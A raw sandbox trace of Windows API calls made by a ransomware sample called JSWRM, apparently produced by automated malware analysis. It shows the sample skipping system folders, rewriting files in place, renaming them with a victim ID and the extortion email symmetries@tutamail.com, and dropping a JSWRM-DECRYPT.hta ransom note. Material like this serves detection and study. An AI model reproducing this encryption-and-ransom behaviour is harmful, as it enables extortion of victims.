MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0058.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.931] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0058.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0058.932] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19c899d1, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19c899d1, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19c899d1, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.932] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0058.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0058.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0058.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.933] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0058.933] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0058.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0058.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0058.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0058.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0058.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0058.934] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.934] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=77232) returned 1 [0058.935] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12db0) returned 0x2471a8 [0058.935] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x12db0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x12db0, lpOverlapped=0x0) returned 1 [0058.941] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.941] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x12db0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x12db0, lpOverlapped=0x0) returned 1 [0058.941] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.942] CloseHandle (hObject=0x3d4) returned 1 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0058.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0058.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0058.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.944] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0058.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.945] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0058.946] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0058.946] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0058.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241358, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0058.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.946] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0058.946] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0058.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0058.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0058.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.947] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1035", cAlternateFileName="")) returned 1 [0058.947] lstrcmpiW (lpString1="1035", lpString2=".") returned 1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="..") returned 1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="...") returned 1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="windows") returned -1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="recovery") returned -1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="perflogs") returned -1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="documents and settings") returned -1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="$RECYCLE.BIN") returned 1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="system volume information") returned -1 [0058.947] lstrcmpiW (lpString1="1035", lpString2="msocache") returned -1 [0058.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0058.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0058.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0058.947] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1035\\jswrm-decrypt.hta")) returned 0xffffffff [0058.947] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0058.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0058.948] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0058.948] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0058.948] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1035\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0058.950] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.950] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0058.952] CloseHandle (hObject=0x450) returned 1 [0058.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0058.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0058.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0058.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225cb0 [0058.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.952] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1035\\jswrm-decrypt.hta")) returned 0x20 [0058.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225cb0 | out: hHeap=0x1e0000) returned 1 [0058.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0058.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0058.952] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19cd5c2a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0058.952] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0058.952] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19cd5c2a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0058.952] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0058.952] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0058.952] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0058.952] 